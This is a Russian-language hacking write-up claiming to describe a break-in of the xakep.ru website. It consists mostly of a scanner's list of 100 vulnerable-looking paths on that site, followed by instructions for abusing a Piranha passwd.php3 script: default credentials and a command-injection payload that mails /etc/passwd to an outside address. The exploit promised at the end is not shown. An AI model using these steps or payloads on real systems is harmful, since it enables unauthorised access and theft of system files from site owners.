В этой статье пойдет рассказ о втором по счету взломе сайта http://www.xakep.ru/
Для начала просканим хакер на всякие ошибки
1. /cgi-bin/powerup/r.cgi Ok! info
2. /cgi-bin/powerup/r.pl Ok! info
3. /cgi-local/shop.pl Ok! info
4. /cgi-shop/view_item Ok! info
5. /cgi-bin/common/listrec.pl Ok! info
6. /scripts/shopplus.cgi Ok! info
7. /edit_image.php Ok! info
8. /cgi-bin/sdbsearch.cgi Ok! info
9. /cgi-bin/udirectory.pl Ok! info
10. /cgi-bin/CatalogMgr.pl Ok! info
11. /interscan/cgi-bin/FtpSave.dll Ok! info
12. /interscan/cgi-bin/interscan.dll Ok! info
13. /interscan/cgi-bin/FtpSaveCSP.dll Ok! info
14. /interscan/cgi-bin/FtpSaveCVP.dll Ok! info
15. /ext.dll Ok!
16. /code.php3 Ok! info
17. /dvwssr.dll Ok! info
18. /null.htw 404 info
19. /form-totaller/form-totaller.cgi Ok! info
20. /includes/global.inc Ok! info
21. /foldoc/template.cgi Ok! info
22. /../config/html/cnf_gi.htm Ok! info
23. /../../../scandisk.log 404 info
24. /bb.sqljsp//..//..//..//..//..//../winnt/win.ini 404 info
25. /isapi/tstisapi.dll Ok! info
26. /products/phpPhotoAlbum/explorer.php Ok! info
27. /phpPhotoAlbum/getalbum.php Ok! info
28. /piranha/secure/passwd.php3 Ok! info
29. /wwwboard/passwd.txt Ok! info
30. /roads/cgi/search.pl Ok! info
31. /ROADS/cgi/search.pl Ok! info
32. /server-info Ok! info
33. /server-status Ok! info
34. /caspsamp/codebrws.asp 302 info
35. /technote/technote/print.cgi Ok! info
36. /site/eg/source.asp 302 info
37. /admin.php3 Ok! info
38. /web/bb-hist.sh Ok! info
39. /~wsapi/cfusion Ok! info
40. /Album/ Ok! info
41. /~nobody/etc Ok! info
42. /officescan/cgi/jdkRqNotify.exe 302 info
43. /ultraboard.pl Ok! info
44. /admin-serv/config/adm.conf Ok! info
45. /admin-serv/config/admpw Ok! info
46. /way-board/way-board.cgi Ok! info
47. /opt/netscape/suitespot/admin-serv/config/admpw Ok! info
48. /catalyst/exec/show/config/cr Ok! info
49. /script.cgi Ok! info
50. /form_results.txt Ok! info
51. /sults_Test/testorder.txt Ok! info
52. /orders/results Ok! info
53. /orders.htm Ok! info
54. /onlineor.htm Ok! info
55. /_private/shopping_cart.mdb Ok! info
56. /feedback.txt Ok! info
57. /orderform/orders.txt Ok! info
58. /scripts/cart32/tempfiles.list Ok! info
59. /scripts/tools/getdrvrs.exe 302 info
60. /scripts/wsisa.dll Ok! info
61. /scripts/repost.asp 302 info
62. /cgi-bin/getdoc.cgi Ok! info
63. /cgi-bin/lister Ok! info
64. /cgi-bin/nto Ok! info
65. /cgi-bin/pollit Ok! info
66. /cgi/ Ok! info
67. /cgi/commerce.cgi Ok! info
68. /cgi/cgiproc Ok! info
69. /bin/test.txt Ok! info
70. /cgi-bin/a1stats/a1disp4.cgi Ok! info
71. /cgi-bin/a1stats/a1disp3.cgi Ok! info
72. /cgi-bin/a1stats/a1disp2.cgi Ok! info
73. /cgi-bin/a1stats/a1disp.cgi Ok! info
74. /config.inc Ok! info
75. /quote.html Ok! info
76. /cgi-bin/cal_make.pl Ok! info
77. /cgi-bin/websync.exe 302 info
78. /content.pl Ok! info
79. /cgi-bin/nph-maillist.pl Ok! info
80. /cgi-bin/talkback.cgi Ok! info
81. /cgi-bin/ustorekeeper.pl Ok! info
82. /cgi-bin/anacondaclip.pl Ok! info
83. /cgi-bin/s.cgi Ok! info
84. /cgi-bin/ikonboard/help.cgi Ok! info
85. /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: 404 info
86. /cgi-bin/store.cgi Ok! info
87. /cgi-bin/bbs_forum.cgi Ok! info
88. /cgi-bin/ezshopper3/loadpage.cgi Ok! info
89. /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report Ok! info
90. /cgi-bin/pals-cgi Ok! info
91. /cgi-bin/sendtemp.pl Ok! info
92. /cgi-bin/replicator/webpage.cgi Ok! info
93. /cgi-bin/webspirs.cgi Ok! info
94. /cgi-bin/auktion.pl Ok! info
95. /cgi-bin/suche/hsx.cgi Ok! info
96. /cgi-bin/hsx.cgi Ok! info
97. /cgi-bin/mailnews.cgi Ok! info
98. /cgi-bin/empower Ok! info
99. /cgi-bin/webdriver Ok! info
100. /cgi-bin/mailview.cgi Ok! info
Теперь расмотрим http://www.xakep.ru/piranha/secure/passwd.php3
piranha - это графический веб интерфейс для мониторинга, конфигурирования и администрирования LVS сектора. Конечно GUI защищен стандартной парой user/pass, но есть аккаунт по умолчанию, который позволит сменить пароли через скрипт passwd.php3
Этот же скрипт имеет дыру позволяющую запускать shell команды. По умолчанию скрипт установлен в директорию
/home/httpd/html/piranha/secure как passwd.php3:
http://victim.com/piranha/secure/passwd.php3
Пароли по умолчанию:
user: piranha
pass: q
После того как скрипт пустит вас внутрь, вывалится форма позволяющая сменить пароль. Она передает новый пароль шелл команде не проверяя на метасимволы:
echo "The passwords you supplied match";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
Это открывает полигон для ввода совершенно новых паролей , например:
g23;cat /etc/passwd|mail hacker@hacker.org;
И напоследок эксплоит (требует авторизоваться):
Вот и всё!!!!!